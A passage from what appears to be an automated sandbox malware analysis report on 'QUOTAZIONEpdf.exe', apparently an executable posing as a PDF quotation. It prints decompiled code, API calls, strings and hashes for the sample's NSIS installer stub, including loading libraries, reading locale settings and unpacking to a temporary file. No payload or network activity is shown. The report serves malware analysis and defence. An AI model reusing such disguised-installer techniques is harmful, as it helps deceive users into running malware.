                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 614 405d7c-405d90 FindFirstFileA 615 405d92-405d9b FindClose 614->615 616 405d9d 614->616 617 405d9f-405da0 615->617 616->617
                C-Code - Quality: 100%
                			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}




                0x00405d87
                0x00405d90
                0x00000000
                0x00405d9d
                0x00405d93
                0x00000000

                APIs
                • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405D87
                • FindClose.KERNEL32(00000000), ref: 00405D93
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID: $B
                • API String ID: 2295610775-2366330246
                • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                0x00405dab
                0x00405dae
                0x00405db5
                0x00405dbd
                0x00405dca
                0x00000000
                0x00405dd1
                0x00405dc0
                0x00405dc8
                0x00000000
                0x00000000
                0x00405dd9

                APIs
                • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: AddressHandleLibraryLoadModuleProc
                • String ID:
                • API String ID: 310444273-0
                • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213stringregistrylibraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 151 4037d3-4037d6 138->151 152 4037db-4037e6 call 403897 138->152 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 150 4036dc-4036e6 GetFileAttributesA 147->150 154 4036e8-4036ea 150->154 155 4036ec-4036ed call 4055bf 150->155 151->144 161 403864-40386c call 404ef5 152->161 162 4037e8-403805 ShowWindow LoadLibraryA 152->162 154->146 154->155 155->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->151 173 40387a-403881 call 40140b 171->173 173->151
                C-Code - Quality: 96%
                			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x61
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                0x004035e9
                0x004035f2
                0x004035f9
                0x004035fb
                0x0040360f
                0x00403621
                0x0040362b
                0x00403630
                0x00403636
                0x00403649
                0x00403649
                0x00403654
                0x004035fd
                0x00403608
                0x00403608
                0x00403659
                0x00403663
                0x0040366c
                0x00403678
                0x004036ff
                0x00403707
                0x00403710
                0x00403710
                0x00403726
                0x0040372c
                0x0040373a
                0x004037c9
                0x004037d1
                0x004037db
                0x004037e0
                0x004037e6
                0x00403865
                0x0040386a
                0x0040386c
                0x00403888
                0x00000000
                0x00403888
                0x0040386e
                0x00403874
                0x0040387c
                0x0040387c
                0x00000000
                0x00403874
                0x004037f0
                0x00403801
                0x00403803
                0x00403805
                0x0040380c
                0x0040380c
                0x00403814
                0x0040381c
                0x0040381e
                0x00403820
                0x00403829
                0x0040382c
                0x00403832
                0x00403832
                0x00403851
                0x0040385b
                0x00000000
                0x00403860
                0x004037d3
                0x004037d5
                0x00000000
                0x00403740
                0x00403740
                0x00403746
                0x00403750
                0x00403758
                0x00403762
                0x00403768
                0x00403776
                0x0040388d
                0x0040388d
                0x00000000
                0x0040388d
                0x0040377c
                0x00403785
                0x004037c4
                0x00000000
                0x004037c4
                0x0040367e
                0x0040367e
                0x00403683
                0x00000000
                0x00000000
                0x0040368d
                0x0040369d
                0x004036a2
                0x004036a9
                0x00000000
                0x00000000
                0x004036ad
                0x004036af
                0x004036bc
                0x004036bc
                0x004036c4
                0x004036ca
                0x004036f2
                0x004036fa
                0x00000000
                0x004036dc
                0x004036dd
                0x004036e6
                0x004036ec
                0x004036ed
                0x00000000
                0x004036ed
                0x004036e8
                0x004036ea
                0x00000000
                0x00000000
                0x00000000
                0x004036ea
                0x004036ca

                APIs
                  • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                • lstrlenA.KERNEL32(afqfmqnwor,?,?,?,afqfmqnwor,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ), ref: 004036BF
                • lstrcmpiA.KERNEL32(?,.exe,afqfmqnwor,?,?,?,afqfmqnwor,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                • GetFileAttributesA.KERNEL32(afqfmqnwor), ref: 004036DD
                • LoadImageA.USER32 ref: 00403726
                  • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                • RegisterClassA.USER32 ref: 0040376D
                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                • CreateWindowExA.USER32 ref: 004037BE
                • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                • GetClassInfoA.USER32 ref: 0040381C
                • GetClassInfoA.USER32 ref: 00403829
                • RegisterClassA.USER32 ref: 00403832
                • DialogBoxParamA.USER32 ref: 00403851
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$afqfmqnwor
                • API String ID: 914957316-2403669375
                • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 196 402d0f-402d11 192->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 203 402d9d-402da1 199->203 204 402d1f-402d37 call 40571d 199->204 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 220 402e02-402e04 202->220 209 402da3-402da9 call 402bc5 203->209 210 402daa-402db0 203->210 204->210 223 402d39-402d40 204->223 209->210 216 402db2-402dc0 call 405e0f 210->216 217 402dc3-402dcd 210->217 216->217 217->189 217->190 220->197 225 402e0a-402e10 220->225 223->210 227 402d42-402d49 223->227 225->197 225->201 227->210 230 402d4b-402d52 227->230 228->182 236 402ead-402eb0 229->236 230->210 232 402d54-402d5b 230->232 232->210 235 402d5d-402d7d 232->235 235->197 237 402d83-402d87 235->237 236->197 238 402eb9-402eca 236->238 239 402d89-402d8d 237->239 240 402d8f-402d97 237->240 242 402ed2-402ed7 238->242 243 402ecc 238->243 239->189 239->240 240->210 241 402d99-402d9b 240->241 241->210 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                C-Code - Quality: 96%
                			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x3d33f
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x3114d
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x31e57
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}































                0x00402c69
                0x00402c6c
                0x00402c86
                0x00402c8b
                0x00402c9e
                0x00402ca3
                0x00402ca9
                0x00000000
                0x00402cab
                0x00402cbc
                0x00402ccd
                0x00402cd4
                0x00402cda
                0x00402cdc
                0x00402ce1
                0x00402ce3
                0x00402dd3
                0x00402dd5
                0x00402dda
                0x00402de1
                0x00000000
                0x00000000
                0x00402de7
                0x00402dea
                0x00402e16
                0x00402e1b
                0x00402e26
                0x00402e28
                0x00402e39
                0x00402e54
                0x00402e5a
                0x00402e5d
                0x00402e62
                0x00402e81
                0x00402e91
                0x00402ea3
                0x00402ea8
                0x00402ead
                0x00402eb0
                0x00402eb9
                0x00402ebd
                0x00402ec5
                0x00402eca
                0x00402ecc
                0x00402ecc
                0x00402ecc
                0x00402ed4
                0x00402ed4
                0x00402ed7
                0x00402ed8
                0x00402ed8
                0x00402edb
                0x00402edd
                0x00402edd
                0x00402edd
                0x00402ee0
                0x00402ee7
                0x00402ef3
                0x00402ef8
                0x00000000
                0x00402ef8
                0x00000000
                0x00402eb0
                0x00000000
                0x00402e64
                0x00402df2
                0x00402dfd
                0x00402e02
                0x00402e04
                0x00000000
                0x00000000
                0x00402e0d
                0x00402e10
                0x00000000
                0x00000000
                0x00000000
                0x00402ce9
                0x00402ce9
                0x00402cee
                0x00402cf2
                0x00402cf9
                0x00402cfe
                0x00402d00
                0x00402d02
                0x00402d02
                0x00402d0a
                0x00402d0f
                0x00402d11
                0x00402e70
                0x00402eb2
                0x00000000
                0x00402eb2
                0x00402d17
                0x00402d1d
                0x00402d9d
                0x00402da1
                0x00402da4
                0x00402da9
                0x00000000
                0x00402da1
                0x00402d2a
                0x00402d2f
                0x00402d32
                0x00402d37
                0x00000000
                0x00000000
                0x00402d39
                0x00402d40
                0x00000000
                0x00000000
                0x00402d42
                0x00402d49
                0x00000000
                0x00000000
                0x00402d4b
                0x00402d52
                0x00000000
                0x00000000
                0x00402d54
                0x00402d5b
                0x00000000
                0x00000000
                0x00402d5d
                0x00402d63
                0x00402d6c
                0x00402d72
                0x00402d75
                0x00402d77
                0x00402d7d
                0x00000000
                0x00000000
                0x00402d83
                0x00402d87
                0x00402d8f
                0x00402d8f
                0x00402d92
                0x00402d95
                0x00402d97
                0x00402d99
                0x00402d99
                0x00000000
                0x00402d97
                0x00402d89
                0x00402d8d
                0x00000000
                0x00000000
                0x00000000
                0x00402daa
                0x00402daa
                0x00402db0
                0x00402dc0
                0x00402dc0
                0x00402dc3
                0x00402dc9
                0x00402dcb
                0x00402dcb
                0x00000000
                0x00402ce9

                APIs
                • GetTickCount.KERNEL32 ref: 00402C6F
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,00000400), ref: 00402C8B
                  • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 00405760
                  • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 00402CD4
                • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                Strings
                • C:\Users\user\Desktop\QUOTAZIONEpdf.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                • Null, xrefs: 00402D54
                • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                • Error launching installer, xrefs: 00402CAB
                • soft, xrefs: 00402D4B
                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                • "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" , xrefs: 00402C68
                • Inst, xrefs: 00402D42
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QUOTAZIONEpdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                • API String ID: 2803837635-3063047783
                • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
